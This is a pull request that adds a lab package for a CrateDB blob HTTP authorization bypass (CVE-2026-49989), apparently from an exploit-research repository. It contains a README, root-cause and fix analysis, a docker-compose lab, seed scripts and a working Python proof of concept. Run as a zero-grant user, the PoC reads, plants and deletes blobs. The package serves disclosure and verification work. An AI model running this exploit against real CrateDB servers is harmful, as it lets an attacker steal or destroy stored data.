### PR TITLE
Add CVE-2026-49989 CrateDB `_blobs` HTTP handler authorization bypass

### DIFF
--- a/CVE-2026-49989/README.md
+++ b/CVE-2026-49989/README.md
@@ -1,0 +1,80 @@
+# CVE-2026-49989 — CrateDB `_blobs` HTTP handler authorization bypass
+
+Exploit Intelligence Platform — public reproducible lab package.
+
+## Vulnerability Summary
+
+| | |
+|---|---|
+| CVE | CVE-2026-49989 (GHSA-2XV8-GJWH-FV8P) |
+| Component | `io.crate.protocols.http.HttpBlobHandler` (CrateDB blob HTTP API) |
+| CWE type | CWE-863 — Incorrect Authorization |
+| CVSS | 7.1 HIGH (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N) |
+| EPSS | 0.269% (percentile 19.1%) at publication |
+| Affected versions | all releases < 6.2.8; 6.3.0 – 6.3.1 |
+| Fix | 6.2.8 / 6.3.2 — commit `74c998c0dc457f7b5036ec773332923124776114` (6.2.8), `00bfe710d0bb60678ff54f57bc87ea555b021fed` (6.3.2) |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-17 |
+
+## Vulnerability details
+
+CrateDB exposes blob tables two ways: SQL (`SELECT ... FROM blob.<table>`) and the blob
+HTTP API (`GET|HEAD|PUT|DELETE /_blobs/{table}/{digest}`). The SQL path enforces
+privileges through `AccessControl`/`Privileges`; the HTTP path authenticated the caller
+but never asked whether the authenticated user may touch the table. Any authenticated
+user with zero `GRANT`s gets `SchemaUnknownException` from SQL but `200 OK` plus the
+blob bytes from `GET /_blobs/<table>/<digest>`; `DELETE` destroys the blob (204), `PUT`
+plants blobs in any blob table unconditionally, and `HEAD` is a digest-existence
+oracle. Deployments that do not use `BLOB TABLE` are unaffected; authentication itself
+is not bypassed (wrong password still returns 401).
+
+## Attack chain
+
+1. Admin (granted on schema `blob`) seeds a secret blob — the legitimate owner path.
+2. Attacker (authenticated, zero grants) is denied by SQL — negative control proving
+   the privilege model is otherwise enforced.
+3. Attacker issues the same access over `/_blobs`: reads the secret bytes, probes
+   digest existence with HEAD, plants a new blob, and deletes the admin's blob.
+4. Admin's SQL confirms the destruction (count 0).
+
+## Fix analysis
+
+The fix introduces an abstract `HttpHandler` base that resolves the authenticated user
+from the `Authorization` header (basic or JWT) and is shared by the SQL and blob HTTP
+handlers. `HttpBlobHandler.handleBlobRequest` now calls
+`Privileges.ensureUserHasPrivilege(roles(), user, DQL|DML, Securable.TABLE, index)`
+before each verb (`GET`/`HEAD` → DQL, `PUT`/`DELETE` → DML). Zero-grant users receive
+`SchemaUnknownException` (HTTP 404/500 depending on handler path) — matching the
+upstream `BlobPrivilegesIntegrationTest` expectations; partially-granted users receive
+`MissingPrivilegeException`. Verified on 6.2.8: all four attacker verbs denied while
+the granted admin path still works.
+
+## Lab run instructions
+
+No custom image is required — the package runs the stock, digest-pinned `crate` image.
+
+```bash
+cd publish
+# 1. start the vulnerable CrateDB 6.2.7 (host port 23978 -> container 4200)
+docker compose -f docker-compose.yml up -d
+# 2. wait for readiness, then seed users + blob table via HTTP
+python3 seed_http.py http://127.0.0.1:23978 seed.sql
+# 3. run the PoC (admin/granted vs attacker/grantless)
+python3 poc/poc.py http://127.0.0.1:23978
+# 4. teardown
+docker compose -f docker-compose.yml down -v
+```
+
+`python3 poc/poc.py` accepts the target base URL as its first argument. The final
+output line is `[SUCCESS]` when the authorization bypass reproduces (secret read +
+HEAD oracle + plant + delete confirmed from the SQL side) or `[FAILED]` otherwise.
+For a patched control, point the same steps at a `crate:6.2.8` container: the PoC
+then ends `[FAILED]` because every attacker verb is denied.
+
+## Package contents
+
+- `docker-compose.yml` — vulnerable lab (crate 6.2.7, digest-pinned, auth enabled)
+- `seed.sql` + `seed_http.py` — bootstrap via the HTTP `_sql` endpoint as superuser
+- `poc/poc.py` — canonical stdlib-only Python PoC
+- `intel_brief.md`, `vulnerability_analysis.md`, `poc_verification_report.md`,
+  `lab_build_report.md` — analysis and verification records

--- a/CVE-2026-49989/docker-compose.yml
+++ b/CVE-2026-49989/docker-compose.yml
@@ -1,0 +1,20 @@
+services:
+  target:
+    image: crate@sha256:65acac647c1df37910c2a007a6a849ee4e11d1f35053d8e1f5c9b06dce0ae971
+    ports:
+      - "127.0.0.1:${LAB_PORT:-23978}:4200"
+    command: >
+      crate
+      -Cnetwork.host=0.0.0.0
+      -Cdiscovery.type=single-node
+      -Cauth.host_based.enabled=true
+      -Cauth.host_based.config.0.user=crate
+      -Cauth.host_based.config.0.method=trust
+      -Cauth.host_based.config.99.method=password
+    environment:
+      - CRATE_HEAP_SIZE=512m
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:4200/ || exit 1"]
+      interval: 5s
+      timeout: 5s
+      retries: 30

--- a/CVE-2026-49989/intel_brief.md
+++ b/CVE-2026-49989/intel_brief.md
@@ -1,0 +1,41 @@
+# CVE-2026-49989 — CrateDB blob HTTP handler authorization bypass
+
+| | |
+|---|---|
+| CVE | CVE-2026-49989 (GHSA-2XV8-GJWH-FV8P) |
+| Title | CrateDB's Blob HTTP handler bypasses authorization |
+| Affected software | CrateDB (crate/crate), official Docker image `crate`, Maven `io.crate:crate` |
+| Vendor | crate (CrateDB GmbH) |
+| CVSS | 7.1 HIGH (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N) |
+| EPSS | 0.269% (percentile 19.1%) |
+| CWE | CWE-863 (Incorrect Authorization) |
+| Published | 2026-08-14 (CVE record); GHSA published 2026-07-01 |
+| Exploited in the wild | Not observed (no CISA/VulnCheck KEV, no ransomware signal; CISA-ADP SSVC exploitation=poc) |
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|---|---|---|
+| 6.2.x | all releases < 6.2.8 | 6.2.8 |
+| 6.3.x | 6.3.0 – 6.3.1 | 6.3.2 |
+
+## Description
+
+CrateDB exposes blob storage through both SQL (`SELECT ... FROM blob.<table>`) and a blob
+HTTP API (`GET|PUT|DELETE /_blobs/{table}/{digest}`). The SQL path enforces privileges via
+`AccessControl`; the HTTP path authenticates the request but never asks `AccessControl`
+whether the authenticated user may touch the table. Any authenticated user — even one with
+zero `GRANT`s — receives `SchemaUnknownException` from SQL but `200 OK` plus the blob
+bytes from `GET /_blobs/<table>/<digest>`. `DELETE` removes the blob (`204`), `PUT` plants
+blobs in any blob table unconditionally, and `HEAD` acts as a digest-existence oracle.
+Deployments that do not use `BLOB TABLE` are unaffected.
+
+## Root cause (summary)
+
+`io.crate.protocols.http.HttpBlobHandler.handleBlobRequest` dispatched every verb straight
+to `get`/`head`/`put`/`delete` with no privilege check. Fix commit `74c998c` (6.2.8
+cherry-pick of mainline `c8a0dccd`; 6.3.2 twin `00bfe71`) makes the handler extend a new
+abstract `HttpHandler` that resolves the authenticated session user and calls
+`Privileges.ensureUserHasPrivilege(roles(), user, DQL|DML, TABLE, index)` before each
+verb; zero-grant failures surface as `SchemaUnknownException` (HTTP 404 on the blob
+handler — verified on 6.2.8), partial-grant failures as `MissingPrivilegeException` (403).

--- a/CVE-2026-49989/lab_build_report.md
+++ b/CVE-2026-49989/lab_build_report.md
@@ -1,0 +1,46 @@
+# Lab build report — CVE-2026-49989
+
+## Runtime topology
+
+Two isolated single-service Compose environments, one per build; only the image
+digest, port, and project name differ.
+
+| Environment | Compose tuple | Image (digest-pinned) | Host port | URL |
+|---|---|---|---|---|
+| vulnerable | `docker compose --env-file lab/.env -p cve-2026-49989-lab -f lab/docker-compose.yml` | `crate@sha256:65acac647c1df37910c2a007a6a849ee4e11d1f35053d8e1f5c9b06dce0ae971` (tag 6.2.7) | 127.0.0.1:23978 | http://127.0.0.1:23978 |
+| control | `docker compose --env-file lab/.env -p cve-2026-49989-control -f lab/docker-compose.control.yml` | `crate@sha256:fb7da5dce6474050ba9af1de47792b4e010a472af164169b3ff316b0acea21a5` (tag 6.2.8) | 127.0.0.1:23979 | http://127.0.0.1:23979 |
+
+Ports derive from the CVE id (`20000 + (49989 % 4000) * 2 = 23978`, control +1);
+both were verified free with `lsof -iTCP:<port> -sTCP:LISTEN` before every `up` and
+are bound to 127.0.0.1 only.
+
+## Configuration (mirrored across both environments)
+
+- `crate -Cnetwork.host=0.0.0.0 -Cdiscovery.type=single-node`
+- `auth.host_based.enabled=true`; rule 0 `user=crate method=trust` (bootstrap only),
+  rule 99 `method=password`
+- `CRATE_HEAP_SIZE=512m`
+- No custom Dockerfile: the stock, digest-pinned `crate` image is used directly, so
+  none is shipped in the package.
+
+## Seeding
+
+`lab/seed_http.py <base-url> lab/seed.sql` executes as the trusted superuser over
+`POST /_sql`: creates `CREATE BLOB TABLE secret_blobs`, user `admin` (password auth,
+`GRANT ALL PRIVILEGES ON SCHEMA blob`), and grantless user `unprivileged`. All
+credentials are synthetic and lab-local; the PoC takes them as optional arguments.
+
+## Source provenance (BVA comparison pair)
+
+Blobless partial clone of https://github.com/crate/crate fetching exactly the four
+tag refs 6.2.7 / 6.2.8 / 6.3.1 / 6.3.2; fix commits 74c998c (6.2.8) and 00bfe71
+(6.3.2) with parents materialized; every remote removed after materialization.
+Archive SHA-256s: 6.2.7 `70e18f7f...8426682b9d`, 6.2.8 `b2133dc0...d99f8415`,
+6.3.1 `5ae07784...553cc2a`, 6.3.2 `320f3e7f...1aca26b` (full values recorded in the
+run's provenance file). No vendored third-party artifacts ship in this package.
+
+## Deviations
+
+None. The package's `docker-compose.yml` mirrors the lab's vulnerable service with
+the port supplied via `lab/.env` (`LAB_PORT`); the control compose lives only in the
+lab (its digest is recorded above for reproduction).

--- a/CVE-2026-49989/poc/poc.py
+++ b/CVE-2026-49989/poc/poc.py
@@ -1,0 +1,150 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : CrateDB - Blob HTTP Handler Authorization Bypass
+# CVE            : CVE-2026-49989
+# Vendor         : crate
+# Product        : CrateDB
+# Affected       : < 6.2.8 and 6.3.0 - 6.3.1
+# Type           : CWE-863 - Incorrect Authorization
+# CVSS           : 7.1 (HIGH)
+# Platform       : Cross-platform (Java service, HTTP API)
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-17
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-49989 — CrateDB blob HTTP handler bypasses authorization
+
+CrateDB's /_blobs/{table}/{digest} HTTP endpoint authenticates the caller but
+never consults the privilege layer (AccessControl/Privileges) that guards the
+same blob tables on the SQL path. Any authenticated user with zero GRANTs can
+therefore read or delete any blob whose SHA-1 digest they know, plant new blobs
+in any blob table, and use HEAD as a digest-existence oracle.
+
+ATTACK CHAIN:
+  1. Admin seeds a secret blob into blob.secret_blobs (legitimate, granted).
+  2. Attacker (authenticated grantless user) is denied by SQL — negative control.
+  3. Attacker issues the same access over the blob HTTP API and receives the
+     secret bytes, plants a blob, and deletes the admin's blob.
+"""
+
+import base64
+import hashlib
+import json
+import sys
+import urllib.error
+import urllib.request
+
+SECRET = b"TOP SECRET: this data should only be accessible to admin"
+PLANT = b"planted-by-unprivileged"
+
+
+def req(method, url, body=None, auth=None, head=False):
+    """Single HTTP round trip; returns (status, body-bytes)."""
+    r = urllib.request.Request(url, data=body, method=method)
+    if auth:
+        r.add_header("Authorization", "Basic " + base64.b64encode(auth.encode()).decode())
+    if body is not None:
+        r.add_header("Content-Type", "application/octet-stream")
+    try:
+        with urllib.request.urlopen(r, timeout=30) as resp:
+            data = b"" if head else resp.read()
+            return resp.status, data
+    except urllib.error.HTTPError as e:
+        return e.code, e.read()
+
+
+def sql(base, auth, stmt):
+    """POST /_sql with basic auth; returns (status, parsed-json-or-raw)."""
+    r = urllib.request.Request(
+        base + "/_sql",
+        data=json.dumps({"stmt": stmt}).encode(),
+        method="POST",
+        headers={"Content-Type": "application/json",
+                 "Authorization": "Basic " + base64.b64encode(auth.encode()).decode()},
+    )
+    try:
+        with urllib.request.urlopen(r, timeout=30) as resp:
+            return resp.status, json.loads(resp.read() or b"{}")
+    except urllib.error.HTTPError as e:
+        return e.code, e.read().decode(errors="replace")
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("usage: poc.py <http://host:port> [admin:pass unpriv:pass]", file=sys.stderr)
+        return 2
+    base = sys.argv[1].rstrip("/")
+    admin_auth, unpriv_auth = "admin:adminpass", "unprivileged:unpriv123"
+    if len(sys.argv) >= 4:
+        admin_auth, unpriv_auth = sys.argv[2], sys.argv[3]
+
+    digest = hashlib.sha1(SECRET).hexdigest()
+    plant_digest = hashlib.sha1(PLANT).hexdigest()
+    blob_url = base + "/_blobs/secret_blobs/" + digest
+    plant_url = base + "/_blobs/secret_blobs/" + plant_digest
+
+    # Step 1: admin (granted on schema blob) uploads the secret blob.
+    s, _ = req("PUT", blob_url, SECRET, admin_auth)
+    print(f"[1] admin PUT secret:            HTTP {s} (expect 201/409)")
+    if s not in (201, 409):
+        print("[FAILED]")
+        return 1
+
+    # Step 2: admin confirms SQL visibility of the blob table (positive path).
+    s, out = sql(base, admin_auth,
+                 f"SELECT digest FROM blob.secret_blobs WHERE digest = '{digest}'")
+    ok = isinstance(out, dict) and any(digest in row for row in out.get("rows", []))
+    print(f"[2] admin SQL sees digest:       {ok} (expect True)")
+    if not ok:
+        print("[FAILED]")
+        return 1
+
+    # Step 3: grantless attacker via SQL — must be denied (negative control).
+    s, out = sql(base, unpriv_auth, "SELECT digest FROM blob.secret_blobs LIMIT 1")
+    denied = "SchemaUnknownException" in str(out) or "MissingPrivilege" in str(out)
+    print(f"[3] attacker SQL denied:         {denied} ({str(out)[:60]})")
+    if not denied:
+        print("[FAILED]  negative control broken: SQL path no longer denies")
+        return 1
+
+    # Step 4: THE BUG — same attacker, blob HTTP API: read the secret.
+    s, body = req("GET", blob_url, None, unpriv_auth)
+    read_bypass = s == 200 and body == SECRET
+    print(f"[4] attacker HTTP GET secret:    HTTP {s} body-match={body == SECRET}")
+    print(f"    leaked: {body[:60].decode(errors='replace')!r}")
+
+    # Step 5: THE BUG — HEAD as a digest-existence oracle.
+    s, _ = req("HEAD", blob_url, None, unpriv_auth, head=True)
+    head_oracle = s == 200
+    print(f"[5] attacker HEAD oracle:        HTTP {s} (oracle works: {head_oracle})")
+
+    # Step 6: THE BUG — unconditional blob planting.
+    s, _ = req("PUT", plant_url, PLANT, unpriv_auth)
+    plant = s in (201, 409)
+    print(f"[6] attacker HTTP PUT plant:     HTTP {s} (planted: {plant})")
+
+    # Step 7: THE BUG — destroy the admin's blob.
+    s, _ = req("DELETE", blob_url, None, unpriv_auth)
+    delete_bypass = s in (200, 204)
+    print(f"[7] attacker HTTP DELETE secret: HTTP {s} (destroyed: {delete_bypass})")
+
+    # Step 8: admin confirms the destruction from the SQL side (authoritative state).
+    s, out = sql(base, admin_auth,
+                 f"SELECT count(*) FROM blob.secret_blobs WHERE digest = '{digest}'")
+    rows = out.get("rows") if isinstance(out, dict) else None
+    gone = rows is not None and rows and rows[0][0] in (0, 0.0)
+    print(f"[8] admin SQL confirms deletion: {gone} (count={rows[0][0] if rows else '?'})")
+
+    if read_bypass and head_oracle and plant and delete_bypass and gone:
+        print("[SUCCESS]")
+        return 0
+    print("[FAILED]")
+    return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/CVE-2026-49989/poc_verification_report.md
+++ b/CVE-2026-49989/poc_verification_report.md
@@ -1,0 +1,49 @@
+# PoC verification report — CVE-2026-49989
+
+## Verdict
+
+`[SUCCESS]` — the authorization bypass reproduces end-to-end on the vulnerable build
+and is denied on the fixed build.
+
+## Environment
+
+- Vulnerable target: official `crate` Docker image, tag 6.2.7, RepoDigest
+  `crate@sha256:65acac647c1df37910c2a007a6a849ee4e11d1f35053d8e1f5c9b06dce0ae971`
+- Control target: official `crate` Docker image, tag 6.2.8, RepoDigest
+  `crate@sha256:fb7da5dce6474050ba9af1de47792b4e010a472af164169b3ff316b0acea21a5`
+- Single-node CrateDB, `auth.host_based.enabled=true` (rule 0 trusts the built-in
+  `crate` superuser for bootstrap; rule 99 forces password auth for everyone else),
+  HTTP on 127.0.0.1:23978 (vulnerable) / 127.0.0.1:23979 (control)
+- Identities: `admin` (granted `ALL PRIVILEGES ON SCHEMA blob`) and `unprivileged`
+  (zero grants) — both synthetic, lab-local
+
+## Reproduction ratio
+
+**3/3 cold-state cycles** fully reproduced (teardown → rebuild → seed → PoC per cycle;
+transcript in `artifacts/cold_cycles.txt`). Each cycle proves five attacker behaviors:
+secret read via GET (200 + exact body match), HEAD digest oracle, unconditional PUT
+plant, DELETE destruction, and admin-side SQL confirmation of the deletion — while the
+SQL negative control denies the same attacker.
+
+## Patched-build control run
+
+Same PoC, same seed, same configuration against crate 6.2.8
+(`docker compose --env-file lab/.env -p cve-2026-49989-control -f lab/docker-compose.control.yml`):
+attacker GET/HEAD/PUT/DELETE all denied (`Schema 'blob' unknown`), the planted-blob
+step fails, the admin's blob survives (SQL count stays 1), and the run ends
+`[FAILED]` — the expected negative. Authentication itself is unaffected on both builds
+(wrong password → 401).
+
+## Bounded BVA summary
+
+Four candidate bypasses of the fix were tried against the live 6.2.8 control (HTTP
+verb substitutions, unqualified vs qualified table names, malformed `Authorization`
+schemes, headerless requests) — all denied. The sibling-surface search over the
+preserved vulnerable/fixed source pair found no other handler taking a table name
+from the URL without a privilege check; the full diff between the trees' HTTP package
+consists solely of this fix. One resolved fixed-build quirk is documented: the
+`_blobs` privilege check resolves the unqualified table ident, so a table-scoped
+`GRANT` is not honored at the HTTP layer while a schema-scoped grant is — a usability
+foot-gun in the fix, not a bypass (zero-grant and partial-grant attackers remain
+denied). No unpatched variant found; disclosure is `[PUBLIC]` — the CVE, advisory,
+and fix are published, and this package adds no undisclosed exploit detail.

--- a/CVE-2026-49989/seed.sql
+++ b/CVE-2026-49989/seed.sql
@@ -1,0 +1,16 @@
+-- Seed for CVE-2026-49989 lab (executed as trusted superuser `crate` via HTTP /_sql)
+DROP TABLE IF EXISTS blob.secret_blobs;
+CREATE BLOB TABLE secret_blobs;
+
+-- admin holds privileges on the blob table (legitimate owner of the secret).
+-- Note: on the fixed build the _blobs handler resolves privileges against the
+-- unqualified ident, so a table-scoped grant alone is not matched at the HTTP
+-- layer; a schema-scoped grant makes the positive path work on both builds.
+DROP USER IF EXISTS admin;
+CREATE USER admin WITH (password = 'adminpass');
+GRANT ALL PRIVILEGES ON SCHEMA blob TO admin;
+
+-- attacker: authenticated, zero grants on any blob table
+DROP USER IF EXISTS unprivileged;
+CREATE USER unprivileged WITH (password = 'unpriv123');
+-- intentionally NO GRANT for unprivileged

--- a/CVE-2026-49989/seed_http.py
+++ b/CVE-2026-49989/seed_http.py
@@ -1,0 +1,28 @@
+#!/usr/bin/env python3
+"""Seed a CrateDB lab over HTTP /_sql as the trusted bootstrap superuser.
+Usage: seed_http.py <base_url> <seed.sql>   (auth: crate with empty password)
+Comment-only chunks are skipped; every other ';'-terminated statement is executed."""
+import base64
+import json
+import sys
+import urllib.request
+
+url, path = sys.argv[1], sys.argv[2]
+auth = "Basic " + base64.b64encode(b"crate:").decode()
+# strip comments first (a comment may itself contain ';'), then split statements
+lines = [l.split("--", 1)[0] for l in open(path).read().splitlines()]
+stmts = [c.strip() for c in "\n".join(lines).split(";") if c.strip()]
+for stmt in stmts:
+    req = urllib.request.Request(
+        url + "/_sql",
+        data=json.dumps({"stmt": stmt}).encode(),
+        method="POST",
+        headers={"Content-Type": "application/json", "Authorization": auth},
+    )
+    try:
+        urllib.request.urlopen(req, timeout=60)
+        print("seed OK:", stmt.splitlines()[0][:70])
+    except urllib.error.HTTPError as e:
+        print("seed ERR:", e.code, e.read().decode()[:200], stmt.splitlines()[0][:70])
+        sys.exit(1)
+print(f"seeded {len(stmts)} statements")

--- a/CVE-2026-49989/vulnerability_analysis.md
+++ b/CVE-2026-49989/vulnerability_analysis.md
@@ -1,0 +1,83 @@
+# Vulnerability analysis — CVE-2026-49989
+
+## Entry point to sink (verified against extracted 6.2.7 source)
+
+1. **Transport wiring** — `server/src/main/java/org/elasticsearch/http/netty4/Netty4HttpServerTransport.java:602-603`
+   installs, in order: `auth_handler` (`io.crate.auth.HttpAuthUpstreamHandler`, performing
+   HBA-driven basic/JWT *authentication*) then `blob_handler`
+   (`new HttpBlobHandler(blobService)` — note: only `blobService` is passed; the fixed
+   version passes `settings, sessions, roles` too).
+2. **Route match** — `HttpBlobHandler.BLOBS_PATTERN =
+   ^/_blobs/([^_/][^/]*)/([0-9a-f]{40})$` captures `{table}` and the 40-hex SHA-1
+   `{digest}` straight from the request URI. No route-level normalization constrains the
+   table name beyond `[^_/][^/]*`.
+3. **Dispatch (the sink)** — `handleBlobRequest(content)` switches on the verb and calls
+   `get`/`head`/`put`/`delete(index, digest)` directly. In 6.2.7 the file contains zero
+   references to `AccessControl`, `ensureMaySee`, or `ensureUserHasPrivilege`
+   (`grep -n 'AccessControl\|ensureMaySee\|ensureSession\|Privileges'` returns nothing).
+4. **Contrast (negative control path)** — the SQL route reaches the same blob tables
+   through `SqlHttpHandler` → analyzer → `AccessControlImpl.ensureMayExecute/ensureMaySee`
+   (`server/src/main/java/io/crate/auth/AccessControlImpl.java`), which is why
+   `SELECT digest FROM blob.secret_blobs` fails for a grantless user while the HTTP verb
+   succeeds.
+
+## Fix
+
+`74c998c0dc457f7b5036ec773332923124776114` "Fix `_blobs` endpoint privileges issue"
+(6.2.8; cherry-picked from mainline `c8a0dccdbb3d01f1818190c2ed5cf6654f77eb6b`; 6.3.2
+twin `00bfe710d0bb60678ff54f57bc87ea555b021fed`):
+
+- adds abstract `io.crate.protocols.http.HttpHandler` that extracts the authenticated
+  user (basic auth or JWT) from the request;
+- `HttpBlobHandler` now extends it, resolves `session.sessionSettings().sessionUser()`,
+  and before each verb calls
+  `Privileges.ensureUserHasPrivilege(roles(), user, Permission.DQL|DML, Securable.TABLE, index)`:
+  - `GET` / `HEAD` → `DQL`
+  - `PUT` / `DELETE` → `DML`
+- zero-grant failures raise `SchemaUnknownException`, which surfaces as `404 Not Found`
+  (`Schema 'blob' unknown`) on the blob handler — lab-verified on 6.2.8 and matching the
+  patch's own integration test; partially-granted users get `MissingPrivilegeException`
+  (`403 Forbidden`);
+- `SqlHttpHandler` is refactored onto the same base class, so SQL and HTTP now share one
+  authorization decision.
+
+## Threat model / preconditions
+
+- Authentication is required and still enforced — the bug is purely that *any*
+  authenticated identity is treated as sufficient for *any* blob operation.
+- Read/delete are gated in practice by knowledge of the blob's SHA-1 digest (no
+  enumeration channel; `HEAD` is the existence oracle). `PUT` is unconditional (storage
+  pollution; SHA-1 content check prevents forging under a victim's digest).
+- Deployments not using `BLOB TABLE` are unaffected.
+
+## Lab strategy
+
+Vulnerable `crate:6.2.7` vs control `crate:6.2.8`, both with
+`auth.host_based.enabled=true` (rule 0 trusts built-in superuser `crate` for bootstrap,
+rule 99 forces password auth otherwise). Seed: `CREATE BLOB TABLE secret_blobs`, an
+`admin` user granted all privileges on it, and a grantless `unprivileged` user. PoC steps
+mirror the GHSA advisory: admin upload → admin SQL read → unprivileged SQL read (denied,
+negative control) → unprivileged HTTP GET (200 + secret bytes = the bug) → unprivileged
+HTTP DELETE (204 = the bug) → admin confirms deletion. A `PUT`-plant step and a `HEAD`
+oracle step are added for completeness. All SQL is issued through `POST /_sql` so the PoC
+depends only on curl.
+
+(Extended by the branch and terminal stages with live-run results.)
+
+## Lab confirmation [FROM LAB]
+
+Both sides of the pair were exercised live (see `publish/poc_verification_report.md`):
+
+- crate 6.2.7 (vulnerable): the grantless attacker's `GET /_blobs/secret_blobs/<digest>`
+  returned `200` with the exact secret bytes, `HEAD` returned `200` (existence oracle),
+  `PUT` planted a blob (`201`), `DELETE` destroyed the admin's blob (`204`), and the
+  admin's subsequent SQL showed count 0 — while the same attacker's SQL read was denied
+  (`SchemaUnknownException[Schema 'blob' unknown]`). 3/3 cold-state cycles.
+- crate 6.2.8 (fixed): all four verbs denied for the grantless attacker, the admin's
+  blob survived, and the positive granted path still worked. Authentication itself
+  remained enforced on both builds (wrong password → 401).
+
+One nuance observed in the fix: the `_blobs` privilege check passes the unqualified
+table ident, so a table-scoped `GRANT ... ON TABLE blob.t` is not honored at the HTTP
+layer while a schema-scoped grant is. That is a usability foot-gun in the fix, not a
+bypass — zero-grant and partial-grant attackers are both denied.

--- a/README.md
+++ b/README.md
@@ -159,6 +159,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;26321](CVE-2026-26321/) | **OpenClaw**<br>Path Traversal / SSRF | **7.5** |
 | [CVE&#8209;2026&#8209;28372](CVE-2026-28372/) | **GNU telnetd + util-linux**<br>Privilege Escalation | **7.4** |
 | [CVE&#8209;2026&#8209;2580](CVE-2026-2580/) | **WP Maps (wp-google-map-plugin)**<br>Broken Access Control + Stored XSS (Unauthenticated) | **7.3** |
+| [CVE&#8209;2026&#8209;49989](CVE-2026-49989/) | **`io.crate.protocols.http.HttpBlobHandler`**<br>CrateDB `_blobs` HTTP handler authorization bypass | **7.1** |
 | [CVE&#8209;2026&#8209;4105](CVE-2026-4105/) | **systemd (systemd-machined)**<br>Local Privilege Escalation (Improper Machine Class Access Control)<br><br>**Bypass / fix review:** class=container + Varlink vl_method_open() missing namespace check | **6.7** |
 | [CVE&#8209;2025&#8209;2753](CVE-2025-2753/) | **Assimp (LWS Importer)**<br>Uninitialized Pointer Array (OOB Read / DoS) (0-day)<br><br>**Bypass / fix review:** recommended fix bypassed via 2 NULL deref paths | **6.3** |
 | [CVE&#8209;2026&#8209;34980](CVE-2026-34980/) | **OpenPrinting CUPS**<br>PostScript PPD Injection to Code Execution as `lp` | **6.1** |
@@ -167,7 +168,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;35414](CVE-2026-35414/) | **OpenSSH**<br>Certificate Principal Matching Authentication Bypass | **N/A** |
 | [CVE&#8209;2025&#8209;59060](CVE-2025-59060/) | **Apache Ranger**<br>Apache Ranger TLS Hostname Verification Bypass | **N/A** |
 
-25 of the 131 indexed packages record a bypass or incomplete-fix finding.
+25 of the 132 indexed packages record a bypass or incomplete-fix finding.
 
 ## Typical package layout
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-49989.

- `io.crate.protocols.http.HttpBlobHandler` — CrateDB `_blobs` HTTP handler authorization bypass
- CVSS 7.1; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.